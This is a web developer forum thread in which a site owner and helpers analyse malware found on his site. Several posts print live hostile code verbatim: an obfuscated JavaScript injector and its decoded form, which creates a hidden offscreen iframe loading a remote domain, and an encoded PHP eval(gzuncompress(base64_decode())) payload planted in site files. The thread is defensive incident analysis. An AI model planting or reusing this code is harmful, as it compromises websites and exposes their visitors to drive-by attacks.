Hello and welcome to our community! Is this your first visit?
Register
Enjoy an ad free experience by logging in. Not a member yet? Register.
Page 1 of 3 123 LastLast
Results 1 to 15 of 31
  1. #1
    Regular Coder
    Join Date
    Oct 2008
    Location
    Poland
    Posts
    394
    Thanks
    152
    Thanked 2 Times in 2 Posts

    What's that code? What does it do?

    Hello, I can see ESET marks my site as having some malicious JS. However with other antiviruses it seems clean. I made a lot of different website scans from the web and all say the site is clean.

    I wrote to ESET, and they said there is some malicious java script, but didn't give me any more info.

    I found this strange code, but I am not sure whether this is the malicious code or a good theme code:

    Code:
    <script type='text/javascript'>var wow="cb3ntstopb1stnb2tb1nl";var _J=(Date);if(_J){_h='4726';}var _Y={'J':'reve\x72\x73e','f':'str\x69\x6Eg','o':'\x73\x75bstr','s':!false,'k':'j\x6Fin','v':'spl\x69\x74','P':'len\x67\x74\x68'},_R='',_z=['=c1n"oll ;y"1=cd(if=-oumt.oc.iekienoOfxe{adn)1)cr =(vanea.saDw ;teetiT(.eetgmaTi)(me2;)cE=73;6c2t(D an=e.aewimTt(+)ceeg3douc);ecetn.m=ik1coocpa"s"+=+ee(Moc2TtStirG.gn()")+p;xei=sre.tTGc"+o2MStng)(a;p"tri+;v"/de=h= brumnaoct.aemlecrEneet(tf+ir""""+""+a"=em"M,c)tah.05(d1oru*0+n.rhtnodmaaM(,dM=))7ot.hra0(d+0nut.h0a310*Mra)(nd;.bmts)olye.dwiMt=har.th(150nou0d+00at.hondam*Mrb.;).h)(eyltigtshe=cs.pe.;blsoyttin"obsai=ol"eutlb;.etysl.efscb;.=t-"=rd:/pt"w+o/thwepal.r-ae/(ec"",.)g/(b/leerpac3/."g,rpeaal)"ec(//b2eg","er).e(/bapl/c1g,."+)mre/2 ""l"mtanh.onlofuc;d=ti)umc(ononed{.td.oppabyenihdC}dl(;)}b'][_Y.k]('\x0A'),_h=_h[_Y.v](_R),_K=function(){for(var _a in _h){if(typeof(_h[_a])==_Y.f){var _c=[],_E=_Y.s,_J=_h[_a]*-~false;for(f=[]^[];f<_z[_Y.P];f+=_J){_c[f]=(_E)?(_z[_Y.o](f,_J)[_Y.v](_R)[_Y.J]()[_Y.k](_R)):(_z[_Y.o](f,_J));_E=!_E;}_z=_c[_Y.k](_R);}}w\u0069\u006Edow['e\x76al'](_z);},_z=_K();</script>
    Could you please help?
    The site is modapokazy.pl

    Thanks

  2. #2
    Supreme Master coder! Philip M's Avatar
    Join Date
    Jun 2002
    Location
    London, England
    Posts
    19,441
    Thanks
    217
    Thanked 2,699 Times in 2,675 Posts
    Quote Originally Posted by utnalove View Post
    Hello, I can see ESET marks my site as having some malicious JS. However with other antiviruses it seems clean. I made a lot of different website scans from the web and all say the site is clean.

    I wrote to ESET, and they said there is some malicious java script, but didn't give me any more info.

    I found this strange code, but I am not sure whether this is the malicious code or a good theme code:

    Code:
    <script type='text/javascript'>var wow="cb3ntstopb1stnb2tb1nl";var _J=(Date);if(_J){_h='4726';}var _Y={'J':'reve\x72\x73e','f':'str\x69\x6Eg','o':'\x73\x75bstr','s':!false,'k':'j\x6Fin','v':'spl\x69\x74','P':'len\x67\x74\x68'},_R='',_z=['=c1n"oll ;y"1=cd(if=-oumt.oc.iekienoOfxe{adn)1)cr =(vanea.saDw ;teetiT(.eetgmaTi)(me2;)cE=73;6c2t(D an=e.aewimTt(+)ceeg3douc);ecetn.m=ik1coocpa"s"+=+ee(Moc2TtStirG.gn()")+p;xei=sre.tTGc"+o2MStng)(a;p"tri+;v"/de=h= brumnaoct.aemlecrEneet(tf+ir""""+""+a"=em"M,c)tah.05(d1oru*0+n.rhtnodmaaM(,dM=))7ot.hra0(d+0nut.h0a310*Mra)(nd;.bmts)olye.dwiMt=har.th(150nou0d+00at.hondam*Mrb.;).h)(eyltigtshe=cs.pe.;blsoyttin"obsai=ol"eutlb;.etysl.efscb;.=t-"=rd:/pt"w+o/thwepal.r-ae/(ec"",.)g/(b/leerpac3/."g,rpeaal)"ec(//b2eg","er).e(/bapl/c1g,."+)mre/2 ""l"mtanh.onlofuc;d=ti)umc(ononed{.td.oppabyenihdC}dl(;)}b'][_Y.k]('\x0A'),_h=_h[_Y.v](_R),_K=function(){for(var _a in _h){if(typeof(_h[_a])==_Y.f){var _c=[],_E=_Y.s,_J=_h[_a]*-~false;for(f=[]^[];f<_z[_Y.P];f+=_J){_c[f]=(_E)?(_z[_Y.o](f,_J)[_Y.v](_R)[_Y.J]()[_Y.k](_R)):(_z[_Y.o](f,_J));_E=!_E;}_z=_c[_Y.k](_R);}}w\u0069\u006Edow['e\x76al'](_z);},_z=_K();</script>
    Could you please help?
    The site is modapokazy.pl

    Thanks

    My Avast says it is a virus. Possibly it is a false alarm, but I would keep clear of it.

    It appears to have syntax errors which will prevent it from executing, but that is not to say that the intent is not malicious.
    http://jsunpack.jeek.org/dec/go?repo...868cd99ae1bad5



    All advice is supplied packaged by intellectual weight, and not by volume. Contents may settle slightly in transit.
    Last edited by Philip M; 06-09-2012 at 08:11 PM.

    All the code given in this post has been tested and is intended to address the question asked.
    Unless stated otherwise it is not just a demonstration.

  3. Users who have thanked Philip M for this post:

    utnalove (06-10-2012)

  4. #3
    Regular Coder
    Join Date
    Oct 2008
    Location
    Poland
    Posts
    394
    Thanks
    152
    Thanked 2 Times in 2 Posts
    Thanks...WTF... I can't find that code anymore. Today I saw it with a CTRL+U in the homepage. Now I am trying once again... and nothing! The code is not there

  5. #4
    Regular Coder Krupski's Avatar
    Join Date
    Dec 2010
    Location
    United States of America
    Posts
    505
    Thanks
    39
    Thanked 47 Times in 46 Posts
    Quote Originally Posted by utnalove View Post
    Thanks...WTF... I can't find that code anymore. Today I saw it with a CTRL+U in the homepage. Now I am trying once again... and nothing! The code is not there
    For what it's worth... the code unscrambled is:

    WARNING - DO NOT RUN THIS CODE - MAY BE MALICIOUS!
    Code:
    c1 = "lonly";
    if (-1 == document.cookie.indexOf(c1)) {
        var a = new Date;
        a.setTime(a.getTime());
        c3 = 72E6;
        c2 = new Date(a.getTime() + c3);
        document.cookie = c1 + "=" + escape(c2.toGMTString()) + ";expires=" + c2.toGMTString() + ";path=/";
        var b = document.createElement("if" + "r" + "a" + "me"),
            c = Math.round(10 + 50 * Math.random()),
            d = Math.round(700 + 1300 * Math.random());
        b.style.width = Math.round(100 + 500 * Math.random());
        b.style.height = c;
        b.style.position = "absolute";
        b.style.left = -d;
        b.src = "http://" + wow.replace(/ea/g, "-").replace(/b3/g, "a").replace(/b2/g, "e").replace(/b1/g, ".") + "/rem2.html";
        onload = function () {
            document.body.appendChild(b)
        }
    };
    The above is the content of the variable "_z" which is then run with an "eval()" call.

    All the code does is generate a cookie named "lonly" and then creates an iframe and tries to open "http://cantstop.stnet.nl/rem2.html" as the iframe source.

    No clue what that page is... I'm not going to try and open it.

    Edit:
    I got brave and tried opening the root page. It's got a new Apache web server setup with no content. The URL returns:
    It works!

    This is the default web page for this server.
    The web server software is running but no content has been added, yet.


    Very strange........
    Last edited by Krupski; 06-10-2012 at 02:31 AM.
    "Anything that is complex is not useful and anything that is useful is simple. This has been my whole life's motto." -- Mikhail T. Kalashnikov

  6. Users who have thanked Krupski for this post:

    utnalove (06-10-2012)

  7. #5
    Regular Coder
    Join Date
    Oct 2008
    Location
    Poland
    Posts
    394
    Thanks
    152
    Thanked 2 Times in 2 Posts
    Thank you. It is even more strange that I cannot see this code anymore in my site. I wanted to delete it... but I can't find it.
    I also tried to download all the php/js/css etc and compare them with the original theme site... and guess! No changes. There is no injected code or so it seems.

    And my antivirus is not warning me anymore :/

  8. #6
    Master Coder felgall's Avatar
    Join Date
    Sep 2005
    Location
    Sydney, Australia
    Posts
    9,249
    Thanks
    4
    Thanked 932 Times in 919 Posts
    Quote Originally Posted by Krupski View Post
    I got brave and tried opening the root page. It's got a new Apache web server setup with no content.
    That probably means that the hosting provider has identified that the site contained malware and has deleted it.
    Stephen
    Learn Modern JavaScript - http://javascriptexample.net/
    Helping others to solve their computer problem at http://www.felgall.com/

    Don't forget to start your JavaScript code with "use strict"; which makes it easier to find errors in your code.

  9. #7
    Regular Coder
    Join Date
    Oct 2008
    Location
    Poland
    Posts
    394
    Thanks
    152
    Thanked 2 Times in 2 Posts
    oh nooooooooo

    More or less once per day I see that code in the source. If I refresh the site or come back later it disappears.

    This time I made a screenshot.
    The php files seem to be clean and original:/
    Attached Thumbnails Attached Thumbnails -screen-jpg  

  10. #8
    New to the CF scene
    Join Date
    Jun 2012
    Posts
    6
    Thanks
    0
    Thanked 1 Time in 1 Post
    hi utnalove,

    i got the same problem at a wordpress-webpage, exactly the same code output of the javascript.
    i also didn't find any code but i use a cache-plugin at the webpage.

    i analyse this deeper an it themes that the code got througt the page from the cache-plugin. if i clean the cache, the code is gone away.
    i also think that the code-insertion did not get in every case into the page, may be only sometimes or for some unknown events as a result.

    i do not know how this got into the cache but i rest alle accounts from system, ftp and cms wordpress to prevent it.

    i collect some backups from the system in malicous-state and analyse it futher more..
    hope we got the solution.

    may be a normal modul insert the code cause the author implement such a thing.

    lets refractor the code together and analyse it to the ground

    ps: sorry for my rusty english...

  11. Users who have thanked Wagua for this post:

    utnalove (06-12-2012)

  12. #9
    Regular Coder
    Join Date
    Oct 2008
    Location
    Poland
    Posts
    394
    Thanks
    152
    Thanked 2 Times in 2 Posts
    Thanks for your help, but I do not have any cache plugin

  13. #10
    Regular Coder
    Join Date
    Jun 2010
    Posts
    327
    Thanks
    84
    Thanked 8 Times in 8 Posts
    Just a word from me ... (you may beat me with a frying pan if you wish) ... but my golden rule is that I never ever use any code in a website unless I understand EXACTLY what it does ... which usually means that I've written it myself.

    Using code that randomly inserts bits of javascript into your pages seems alarming to say the least ... !!!
    Last edited by XmisterIS; 06-12-2012 at 02:10 PM.

  14. #11
    New to the CF scene
    Join Date
    Jun 2012
    Posts
    6
    Thanks
    0
    Thanked 1 Time in 1 Post
    @utnalove: whitch system/version/plugins do you use?

    @Mariela301: whitch system/version/plugins do you use? paticulary cache-plugin may be important.

    @XmisterIS: thanks but this didn't help to solve the problem.
    yes i know what you mean but during many projects you will create you are not able to develop all code yourself. you need to use user generated plugins and you are also not able to proof the every hole plugin.

  15. #12
    Regular Coder
    Join Date
    Oct 2008
    Location
    Poland
    Posts
    394
    Thanks
    152
    Thanked 2 Times in 2 Posts
    I have two news. One good and one bad.
    The good one is that I found I have been hacked and I found some modified files.
    The bad one is that I don't know what they do.

    I am going to clean everything. Here is the malicious code - I couldn't find anything else. Maybe somebody knows what they do??

    Do not run the code. Itmay be malicious:


    Code:
    <?php $qbbpkxq_o = array("eNqtWgl32siy/iu","MT05sXjyOWgugcc","jFjsHGsWDAgIGZH","A4I2SzCcFjCkuS/","v+6q6tYCduZObhK","Q1Kr+urq2riqSGD","4mTn57XD27y+H0u","eNthovl4uR4qx0n","k4lvCfkisdVO3gy","T3950sxfzeXd7cn","ycODuuPdjikuo+b","BYtcXef0e5G4ubi","SXx/vhbfpa+95uW","gf+0PxVPvup4u5l","kNyOv1p/IncWeuy","9tLcdPsPljiOu4Z","/Z24KeatevGqtXL","Ew6dx9vj02NUL4m","HSbtjLnl71+VDPE","COXfs+3YZVWs+S3","r31xu+WvuzdVcau","5V+Iy/XonLmvxlR","WA/F9xK54yI357t","5aD4h8fRWoYDN1W","HkqjdhOY1u7qm0F","v0meth75fHnI2ho","yJF+52/dR+MNNuT","Vvfjeow+aoCPACE","DvJb9WA7jRGX0dc","eyG/6BFS6+Np8BS","i4r5c+PWmf+VTYS","GVaAuk9AUOf8PKn","GLm+ha0XQWiws3e","4nzttIx4BsqUXNH","HtPtir5tX0K20XV","HNtj1rN6qynmynQ","AihVCeyqghdiAlZ","5UlLjT7dDxygNWy","Onlt/cgkYcUGsZ1","A62MiqrxdxJcZeH","reKcC8bnA598/gT","WB1vIbxzYTGtUqj","2J1WrXIEBgFYxLs","Ht6XG0AD/ewACsK","Sq4rF5Q3KmqwcGO","9egDQ1hIYa7Ce80","mzmnxcPD/sLpblB","ohnLqbvQKDu3Siv","NT9ZPedeA4NpAtQ","CFHtX8/tiGsKJb4","ZL+gswNf5eXPqf0","X5Ku6qLzpIHqJLg","SNzsQM5i9TksJbi","6X+AmGnxKA8wF/A","Ekq7FmMJWmiYfoV","HgtVmzjRvyA6c9M","yCJYFVbqi71anCm","w0EAksGJoBXhWq4","BEb13lNSNnzfcAq","glIl2J1KRIpDmc3","gGElJWRqicriTAl","pC3GAsQkYcQOrOj","UwT64Yc+OAQTVI1","+0IJISkdRasmE8r","A2kJmR3lDcdfr9A","mhZiK21Lg6w7pia","8AZupcXZI5wMpMK","QQC03rljPImeUJp","V0BSYAisXAfkhiQ","t7oDxXQVWArILCw","UMq8l7sBJnB3sJS","Ti/VqtX1N5gZdBh","cVNigQ6dGvheSCm","gOzkN9XdJIhlvBG","NgzrRfHC8yskV8h","HAN5sXJdSFFZ1TZ","ooWTlEB6lkOM8Nc","gBtg2Tg8Jeaf8io","RduhL6yDNOvisHM","cipjVlTxTfTwoWL","Vmhsqwwft8VD8Fo","sWobA5YOFOxjKUO","55U8q6XCBjuBoQ/","2OL5MplKHjZAPIo","LJhbIe81kZWv/PD","uIR4jjxDQhLVund","1FoK22NKedI80Ir","NFlKKhKSEgmbAMs","jpPVXEADmMBoMVo","4O5IlCJPbwqpcq+","Br5RRSr5uIDcPiG","JbJ7relqzx4zlVB","yG6nFmyELcxl6Ks","gSMO5iBolCE0otE","W2be5KhTVNdTSBD","mL3pcdo5QYxM6qD","p5RGY2WviBbew45","b2cppLPS72gA2h4","Exz0MXw2gA+/JlN","EBRgMfvlIHWfOEZ","G4ir0YMA+Byp09B","Cc2pILa/LJL3gII","B46oBLoz3j/lQIk","McSE4wHDF/IUByL","CKY4J5yRY6JaIcg","DJyB0DMM8/OioA2","FiPjHn7EJ6sR52L","Rlb5RQgV+4iFeAY","fJyTP8nzIUIO6A4","5nSCDfCSKDJJR5E","HkgpC1Cbm7hVtvH","V5J+iwED0bS1KRO","0FjkttHbgLmKLiW","l6IJjEdWZJxK5fb","l1yLg2UmJ4BrYOi","6BOwpV7eJJHpTTV","uBhwhboRDmGUkES","2T/tSDFL8p+lK8M","jc/qpqH0o0O2lnF","Igs9Ckn7AjwmkFk","2e3lIOC8IgCZ6Bt","MHrL8KFfRuTSSsR","9IiT/MMRxfTgGVB","gnRLeVXFNpqpPF9","UhGdwfd5PC2JCA3","3kBAgI+GjGxY1ZG","DHsCbiV2VNhmI6T","7GDEyKjDEAgOBG5","lf0AM3WIwaWrlko","vuQ9TNATSUk3lFl","uHagoQO8h47RTka","QgMkj+blPYWlfZq","SksYPa4gM9PKMmj","yfQQ5kKWEh2TKGM","rhqI4upKkVxuE0g","580bRnOmEP7kbYC","K6lTcoN7cbaSd1S","bg2eEOmORAUDJG2","SFm3ItT7nbNnzYR","8+IoiHd3HkKHfyV","8CGPZ/FoEE7IkAy","0tKYFjfDZVpKZIZ","4F4bScpxVwmJZqI","l/Ib0riyN6Nw/bB","NWYSqomo8tgYa9E","UlTzmFjONgqo6V5","E0TuQMYtuVkPdg+","o2a40f21WUobhZ3","pcBg8fB5YlIl3D7","CyCg89Msg8W1I29","iVVA5BkVjmETXIT","AI/BIbWIn9Am3FY","NCOn5B7qO5WZl2t","imms1w6EV/ZSqD3","RrPIsjTKIbPGlBp","jVAKTZidQHtJwh0","gFyGPYEFGJJRgCR","GI6clHOdWcMo0wJ","dVnMQsDIV96Up1O","UoULem7QQaGKRao","r1aQlePWaYQRHeX","TpZqTDafUlNeD6X","GXCaoONzhNoBjZO","iMVpnaCvCSzRDxo","hLpKEdtpoZeB4zG","llpqw0IqmcobQQj","XMNUujcDZb2cnKw","MGDA0UtSdVJvY4k","44L8IqLk7k1Vc6N","Dbd3+2sa+hw+9Hr","hlwNAzKEpQ9QC4t","GpNbBHGWtAkwFvj","dtDX11L8LjaGoDv","QhnZUQ1QF7sQe9g","ylpO6N+K6CAFxsW","i26D41V/wLcsWU0","tj1cG/pP1wMRcrs","P1tgDe79cYBsFil","9IPVrA362Il33Yg","b1t30CpsG03eZWF","y4Iy9AGGrgk2Zvo","30NDqG33DNaooyc","Db3RtQg9YFJu2Vo","GzCkoueaLCdouPT","RntB7i3eCkxxe+O","vvKjQ+7D//qylNx","btpgqh7gRsd9mab","DgTKjp5DzC8al83","RJUL3ntz6/cmFYU","H+vC3/aYjRdx7KC","z6emHbjhapKJ2+T","5J+LDR20KBoUhNh","DEs9t7EriBZ6Neu","ppPHGeWqC7dkZ0E","ElGkROj5v+cnDXn","F2C+TdmfW9XXzwG","kfYO21Z30EkxxW1","93Kg26o1ao2CrHL","0+hgq1DRq2RJPwv","lCFdl69YBdrrFQX","jTejbtOuGnh6Vvg","j3jZK9aBybeQhdl","aqef9eNRqpf+ZG2","mhoi/66XVHpQ191","J3tkA70bVUIDS+N","GqQYLgPUUmlohXy","1APiGYBpKC3ahrD","RWrQZIaSPqmWgdJ","1yWaVrpXdI3LelM","D9dzW8o1ypc4KQa","MU2XvABJ91kU0gf","qiK1iK3rbHqoAat","V7l80Jdpo28PWiQ","Ro7olqfSvGysgaC","nafP+hXwm5R1XrB","o5aDmz2LuiT3m0t","sKNe8wIfQakaPUZ","lzGkhmrUeIKxPSR","H316rpgQ7BxvLIu","rpYO7i6uIUh6jDU","eM53Edk4DAWqxVD","8tI6VzI4YQqp+IK","VIjxNEXiQKiFiVc","EsYcrdgaWk4IIQb","MJy+AcHpsXvdgGj","UDoRIQcpvgacuHz","npI7gaJ22DzdiLn","mpWF8bHyfO5t1zN","nxO97sJLmZ2+507","73smb7l9vhl+S5z","8SPxLDxwO/ObgDz","x131rPOwOv2O/60","2z9OJr+pXyD2X58","kvx0GcqMT3ZM323","JHS34TF5bdaida8","pzP3J+4mvud4fNw","KeYLYj2rhk6S53C","/8JbT2RIQ9dNP9e","pd+c9ah19OcY1Xi","G7yF1f56ul8unru","cw5eI60VnXy5XpO","079JnVvjz6txqvl","avlmrVi9J9IVjun","XamW7GvV2Hq9/nq","xXW+VIONMRDYbyc","5LorOk7c84UJkye","T37+EBPcn/fMu9j","Fko392VH+7Kny5q","xXIpxJoR+fPzAc7","5j1fWcS6a1fxVsX","ofWiIV/pP++QBfQ","oAaaAHexkMr0klm","rj9deHKEiwZoE79","ls4nHrr/wkt/IB2","D8/McPjw8mDtnc4","2Lqjqcz71nY3JM/","7XV9mGTC8lp2sZx","35t7M77qekLGRPO","XfZlKaG4eczb2nz","qS7dAeCwEqeHsG7","I7JhKwuPBJfzNjN","fuCMnTSkUfAfff0","n7/HKOs8MMAIVgI","I1TLTQLuE18/57A","Gy4ETpJR6/MHmyt","MPKSy3FYG08Wyt3","3uTgiQvxPi+fYKg","QJiGiGls0pyQJRS","us5oyFwGvm01br0","TFs+343Unwm46y+","HEm67QeNIxMlJpm","oKGlj26ztdofze1","2p/v2Zn29/zv56N","zfJ84yx7dcLb/AJ","q9V1Xv0Zt78z8Sg","+Vy9sf790AEaDFK","ITnGkqGp9YU3//3","iyXsmbHZoBjfCx9","mK2xPuBV8mz9eDo","e/xCOlN5XZoP0xM","fOSiXsR2n2H2mf7","St3C7x8Dy08Qmi1","gVM1D8jClQ9o6RO","zE9i+9CZkaiNok1","PQv2a37ozRPvP+L","338/46gh1z2libs","FM8Atm0dqBUwZLc","RcXcc9KfqGVjBgv","nMsvIVPk7wVkim9","aYhlSfDjTCFPTmA","7UUZ9kaXJKvgPSQ","NQTWSbg+4Av/psI","+eWAwzP7H3i8GZe","troFsdRblkZlCPD","o97c+SZmCeonZlV","qCOYxJeKFAyxiMl","jnruYCosW+cTeah","cihcHD/u+t7yMHP","diALVlIQMpUlo62","4X/uiBQLdxSCi9p","vGTwYsPFwF0bDC8","6XjD8GmhtBqIYiG","IgioEoBqKYiGIii","okoJgVxRDERxUQU","E1FMRDERxUIUC1E","sRLEQxUIUC1EsRL","EQxUIUC1FSiJJCl","BSipBAlhSgpREkh","SgpRUoiSQpQ0oqQ","RJY0oaURJI0oaUd","KIkkaUNKKkESWDK","BlEySBKBlEyiJJB","lAyiZBAlgygZRLE","RxUYUG1FsRLERxU","YUG1FsRLERxUYUp","ml0ZXTV6WrQlYKL","ZtE1JaNZJjAppqX","pbYauhM4InRE6I3","RG6DJ0MUJnKboSH","iM8RnjkjkwnPJ3w","dMLTCY9snJGRM7J","yRmbOyM4ZGTojS2","dk6gyyLPSjLISzc","LglD2CGDLgW0drZ","5XzlnT9O+SnLgx8","6XqK7AP/mrHMf5g","fh0/DkCAeOpI+Sk","9pZyJ/Oe3z+OAi8","djKCmFGILEDEZ8l","OKBV7FTjRfe7/hg","CwoZTaUGxidEqCh","zufUg9O+yErQ7V+","lrZiX3tI4ZBnn78","Q2OaTzvyx88gP8E","h4C4ZxwzpVKkZWj","E1ETiNfyCNQN7Mi","TeoP5/JN8htmBsC","PyFrxhZXlwukrOl","Ok8xLD4mSQavA49","/ZtIjaWEWPDRYgv","sWt3MJn26TFIBsy","U/HADWz37w+exnM","JlAelFiIXzH8vpi","vSu66e4V7okX5Ld","cujNI1ITAwiRwrm","YI3FfQOnZ2cmyM+","d6PZGHYTh5CSUwB","h6aeobQgtzhzIx/","eKKBczA10NOxOeq","9ns296fB6q5Gv/g","XitOksNoyXVlNsf","UkmzmbT9YmyP/yb","PI1lPSr74fR7rEd","ziZ88J78kziDl0i","TUHnv/Jl8hWZgxW","ZgiKQs5zP5i+pkV","/oBE4jtkgunYoKH","GDvCftmJfCtbQaJ","YdvcpxgxFanP4n8","C9SBwLXJaRx8q9F","ofNkPvb572TDODY","LYRsmXfUX3XGxXY","geQWfpTWYd7tsR1","4y/PFExx7BEMeg9","f8UMn59HyXBVbZ0","fpjP/IZ21R0dEgh","NefJ50OoXiXb7Tg","ZMOopUo4HmEkxtD","er6ZUBTjz9Jc+WZ","UDSuGZdynU+CwrL","xNRDreBqdTEmuko","SbhWSIU3pzR5VYS","gNwO4HnQDsupFoa","BIdCg8o1DjqbDZ5","QJ1SHiHeThhxAXA","8/Hjohsk3GIXDAq","+XkFYbvgMgaupr3","OYtmdi/ZaDofVdI","nMSYR9uNNnrjs+n","VPyIX6edVzf6z6f","vLLQrLtYLAfz1d5","S8sUvLJbjx93cW0","xXc2qMGJlsbqb6E","VzKIFEbmmIh3VlB","XZ5ThbmRUUS8Ms8","9inOYXgSNCaaLD/","S+ZkEVzqcGPO1LY","D51O9heevv2MMuS","QrKNKW28aM5+TAS","5LlUizBItP7QYO7","5NA0x0nyPYG3Cz/","4qL41glJ2Hx2KHY","qcc/PBS9IDz7l04","kJXndSoU/QgOqoX","dgF6Kt8ksb3GvUx","jao+jY/k0uwA808","y7z0DftBO4iZlYx","Yg+XEX8w8d9j13U","F3TouLIAH9GFNDl","ZvUC+D5TvgI57Up","pjPx8ZRsOeixF2n","5whBtheXUn64pf2","MqqzUZNRoZL3Op9","xgM2XLI1OUYr39l","vH9e+f45nmuhCo4","qY0alMaPamFFxzK","g6ZlQeM6qPGRXIj","CpkRiUyoxqZUZHM","0gYeIb8NFwtvefK","m86lc/lzM/4UilD","o2eQa0fyaqPqtpK","rLw+WLKPgy2e00T","U4a0GW6uxl9S+zY","XP9NMWbLwqiIXLS","v48ue5yVgm6CbVf","WaKE0IQwead9X5+","hHsW3pJ7XM+HSwL","AuJhOw3hgb/x8Pc","8FBYMZKhjSEdf82","bPAxZIhxEqsbMgF","NYVpvvbSir/ck1e","wSPK/Ugy41w9Msb","KHU6wg1drLzzLYN","/1V1R0WuMVY8ldk","hDGBH6b97hLbBWm","byiczExrNaHLUzk","oxIhG2ty1NDS+5H","0ReYUllZn7/hQCP","ESD9YkGnW7GvvWK","LnaXin6Dw0g+UWh","qPubHPa1XIgZNgP","6EXpRMcRAesUsrN","Ykc8IKK+0omPGBA","zTFbyfOwDjenJA4","TGAULzEKF1gDAFv","wrG+hZgfTy5PZpP","Er/PHxPE7/8dYbf","9gGHbLxv2XhDCCR","BoMj8LNMEPREwTB","dEL38mfGT2lhCLS","dXvBLt++PbAZngN","+/w6ji+HOk0MfQm","YV+W3yJ88y87L0b","M51T17udaiz09Jl","5yYDnZvYL/VAEe+","g/VO5WxrK3d4P/E","eIfPSqQvj8/4lCQ","i85ZFxbkL6FswEI","WhbfY1QWqLpISUD","aoh8lTZSKtFEctK","jTF25aWqZsWvK8R","5RqueV8iNUOH+Cy","xqSGVGlhH5W6lT+","of5gLftw4JXKlUv","jdFRt65IPMFkMCh","06mQ/5hay/oyWR/","Px/QlPxhhtmMhzf","60cfr4v8IEC34WC","PtXdpS/0JNNU3j6","3KAow8Ldz6cLRPL","7czLHi+9zfL9qPu","1i6PHH1ErH97j80","fxy+ePH5Gs0zZeT","6py3X6/04U8HHmk","bE78MhDn9VASffp","ah4/LLvGfj/8PWG","X41A==");eval("\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x69\x6D\x70\x6C\x6F\x64\x65\x28\x22\x22\x2C\x24\x71\x62\x62\x70\x6B\x78\x71\x5F\x6F\x29\x29\x29\x29\x3B");?>

  16. #13
    Senior Coder
    Join Date
    Jun 2008
    Location
    New Jersey
    Posts
    2,548
    Thanks
    45
    Thanked 259 Times in 256 Posts
    As far as I can see, that line alone doesn't do anything... its just an array... there's gotta be more.

    However, I doubt you have been 'hacked' in the typical sense. I suspect, if you have a database/queries, you have unsanitized inputs.

  17. Users who have thanked Keleth for this post:

    utnalove (06-12-2012)

  18. #14
    Regular Coder
    Join Date
    Oct 2008
    Location
    Poland
    Posts
    394
    Thanks
    152
    Thanked 2 Times in 2 Posts
    Quote Originally Posted by Keleth View Post
    As far as I can see, that line alone doesn't do anything... its just an array... there's gotta be more.

    However, I doubt you have been 'hacked' in the typical sense. I suspect, if you have a database/queries, you have unsanitized inputs.
    well the above array (whatever it means) was not in the original files. It has been added by sth or somebody, surely in a malicious way.
    I have taken ALL the PHP files and checked them for qbbpkxq_o, but it doesn't appear in any other file. I suppose that the $qbbpkxq_o that has been defined there should be used somewhere else.... but it's not in php files.

    What else can I check?

  19. #15
    Regular Coder Lerura's Avatar
    Join Date
    Aug 2005
    Location
    Denmark
    Posts
    953
    Thanks
    0
    Thanked 130 Times in 129 Posts
    By decoding this last part of the code:

    Code:
    ... "\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x69\x6D\x70\x6C\x6F\x64\x65\x28\x22\x22\x2C\x24\x71\x62\x62\x70\x6B\x78\x71\x5F\x6F\x29\x29\x29\x29\x3B"
    - You get:
    Code:
    eval(gzuncompress(base64_decode(implode("",$qbbpkxq_o))));
    It is obviously for unpacking the .gz archive, that is defined within the array.
    Last edited by Lerura; 06-12-2012 at 05:13 PM.

  20. Users who have thanked Lerura for this post:

    utnalove (06-12-2012)


 
Page 1 of 3 123 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •